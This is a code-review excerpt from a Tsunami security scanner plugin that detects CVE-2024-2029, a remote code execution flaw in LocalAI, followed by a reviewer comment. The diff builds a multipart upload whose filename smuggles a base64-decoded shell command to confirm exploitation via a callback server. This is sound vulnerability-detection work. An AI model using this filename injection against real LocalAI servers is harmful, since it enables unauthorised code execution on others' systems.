community/detectors/localai_cve_2024_2029/src/main/java/com/google/tsunami/plugins/detectors/rce/cve20242029/LocalAiCve20242029RceDetector.java

```diff
@@ -0,0 +1,251 @@
+      PayloadGenerator payloadGenerator,
+      @OobSleepDuration int oobSleepDuration) {
+    this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build();
+    this.utcClock = checkNotNull(utcClock);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+    this.oobSleepDuration = oobSleepDuration;
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("Starting LocalAI CVE-2024-2029 RCE detection.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::checkIfLocalAiWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean checkIfLocalAiWebService(NetworkService networkService) {
+    String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+
+    String modelsUrl = targetUrl + "models";
+    HttpResponse response;
+    try {
+      response = httpClient.send(get(modelsUrl).withEmptyHeaders().build(), networkService);
+    } catch (IOException e) {
+      throw new RuntimeException(e);
+    }
+    if (response.bodyJson().isEmpty()) {
+      return false;
+    }
+    return !response.bodyJson().get().getAsJsonObject().get("object").getAsString().isEmpty();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    var payload = getTsunamiCallbackHttpPayload();
+    if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) {
+      logger.atWarning().log(
+          "The Tsunami callback server is not setup for this environment, so we cannot confirm the"
+              + " RCE callback");
+      return false;
+    }
+
+    String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+
+    String modelsUrl = targetUrl + "models";
+    try {
+      HttpResponse response =
+          httpClient.send(get(modelsUrl).withEmptyHeaders().build(), networkService);
+      if (response.bodyString().isEmpty()) {
+        return false;
+      }
+      ByteArrayOutputStream output = new ByteArrayOutputStream();
+
+      // starting the building of the HTTP POST Body
+      output.write("--------------------------YMvF9bJTpBcQA5CcxzUEx3\r\n".getBytes(UTF_8));
+      output.write(
+          String.format(
+                  "Content-Disposition: form-data; name=\"file\";"
+                      + " filename=\"a;$(echo %s|base64 -d);\"\r\n\r\n",
+                  BaseEncoding.base64().encode(payload.getPayload().getBytes(UTF_8)))
+              .getBytes(UTF_8));
+      output.write(
+          Resources.toByteArray(Resources.getResource(this.getClass(), "simpleAudio.ogg")));
```

Comment:
Please verify https://github.com/google/security-testbeds/pull/100#discussion_r1877922125 and then simplify the detection accordingly if possible.

```suggestion
```